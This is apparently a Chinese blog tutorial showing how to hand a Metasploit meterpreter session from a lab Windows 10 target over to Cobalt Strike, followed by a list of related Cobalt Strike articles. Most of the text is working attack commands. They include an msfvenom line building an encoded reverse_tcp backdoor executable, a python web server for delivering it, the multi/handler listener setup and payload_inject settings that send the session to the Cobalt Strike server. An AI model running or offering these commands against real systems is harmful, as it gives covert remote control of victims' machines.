Cobalt Strike 注入msf会话
目录
(一)环境准备
1、启动服务端
2、启动客户端
3、一个在msf拿到权限的靶机
(二) 配置msf创建监听
1、使用msf创建后门
2、使用python创建一个web服务,然后使用靶机下载
3、配置监控并获得meterpreter
3.1、 启动msf
3.2 、 创建监控
3.3、加载payload
3.4、配置监控参数
3.5、后台当前session
(三) 使用CS进行监控
1、加载msf的payload注入功能
2、设置payload的反弹方式
3、查看参数
4、设置cs监听端口
5、设置控制会话
6、设置当前msf不接受监听数据
7、执行
8、进入CS监控器
(一)环境准备
1、启动服务端
kali操作系统
2、启动客户端
3、一个在msf拿到权限的靶机
我这里是在虚拟机里面的windows10已经下载好msf的靶机。
(二) 配置msf创建监听
1、使用msf创建后门
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4567 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 5 -f exe -o payload.exe
2、使用python创建一个web服务,然后使用靶机下载
python -m http.server
使用靶机下载恶意代码:
3、配置监控并获得meterpreter
3.1、 启动msf
msfconsole
3.2 、 创建监控
use exploit/multi/handler
3.3、加载payload
set payload windows/meterpreter/reverse_tcp
3.4、配置监控参数
show options
set lhost 监控IP
set lport 监控端口
run 执行
在靶机执行后门程序中等待返回 meterpreter
3.5、后台当前session
background
或者在命令行里面直接输入sessions,显示当前存在的session:
(三) 使用CS进行监控
1、加载msf的payload注入功能
use exploit/windows/local/payload_inject
2、设置payload的反弹方式
set payload windows/meterpreter/reverse_http
3、查看参数
show options(图一)
set lhost 192.168.0.2(设置cs服务器的地址,图二)
4、设置cs监听端口
set lport 4567
5、设置控制会话
set session 1(看情况而定)
6、设置当前msf不接受监听数据
set disablepayloadhander true
7、执行
run
8、进入CS监控器
接下来就可以用cs进行实际操作!!!
Cobalt Strike 注入msf会话相关推荐
- APT组织最喜欢的工具 Cobalt Strike (CS) 实战
一.Cobalt Strike 背景 Cobalt Strike 在威胁攻击者的恶意活动中的使用次数正在增加.从 2019 年到 2020 年,使用Cobalt Strike 的威胁攻击者增加了 16 ...
- cobalt strike 的基础使用
cobalt strike 的基础使用 本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源自于靶场练习,仅供学习参考 ...
- Cobalt Strike 3.13的新功能
Cobalt Strike 3.13现已推出.此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons. TCP Beacon Co ...
- Cobalt Strike与Metasploit Framewor联动(会话传递)功能演示
一.前言 Cobalt Strike 是一个为模拟对手和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁.CS集成了很多功能,这些功能为渗透测试提供了便利的操作.同时CS还支持丰富的插件, ...
- Cobalt Strike 域内渗透
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...
- Cobalt Strike|Beacon原理浅析
Hello大家好哇,我是你们可爱的lmn小姐姐,今天我们来研究一下Beacon的一些基础知识,如果有师傅没有看过这个系列之前的文章,可以点击下方图片阅读. Cobalt Strike 作为一种后渗透工 ...
- Cobalt Strike 使用指南(资源整合笔记)
0x00 写在前面的话 Cobalt Strike自出世以来,一直在红队常用的工具行列.因其优良的团队协作性,被冠以多人运动的必备利器. 本文将网络上各路神仙的经验分享以渗透流程为依据进行了一次整合, ...
- Cobalt Strike使用教程——基础篇
本文主要介绍 Cobalt Strike 4.3 的基本功能及使用方法,具体分析和实战中使用放在另一篇讲解:Cobalt Strike使用方法--实战篇. 文章目录 一.基本介绍 (一) 目录结构 ( ...
- 渗透工具-后渗透-权限维持-Cobalt strike
Cobalt strike 渗透测试人员的先进威胁战术 英文名词翻译对照表 命令快查 Cobaltstrike简介 Cobaltstrike架构 信息收集模块System Profiler user- ...
最新文章
- 自定义View合辑(8)-跳跃的小球(贝塞尔曲线)
- 基于 Bitbucket Pipeline + Amazon S3 的自动化运维体系
- android中Invalidate和postInvalidate的区别
- 后端不哭!最新优化性能经验分享来啦
- 40K刚面完Java岗,这些技术必须掌握
- leetcode之回溯backtracing专题3
- php生成网页缩略图接口,php生成网站缩略图
- 2015/8/29 Python基础(3):数值
- CCF NOI1139 高精度减法
- 1.5 案例:多项式曲线拟合的比较
- linux 移动压缩包 命令,文件的复制、移动、压缩等对SELinux属性关系详解
- 10月10日,可为程序员节日
- php商城系统源码的好处有哪些?
- 【ReactJs学习笔记总目录】
- android国外壁纸app,4K Wallpapers,火遍全球的4K高清壁纸App,谷歌市场1300万好评!...
- 功能更新 | 身份认证增强安全配置
- KT142A语音芯片IC的固件升级方法详细描述,PC升级和U盘升级
- 卓有成效的管理者—第八章 结论:管理者必须卓有成效
- Atcoder 4244 AtCoder Express 2 暴力
- 计算机专业在线杂志,计算机类的cscd期刊汇总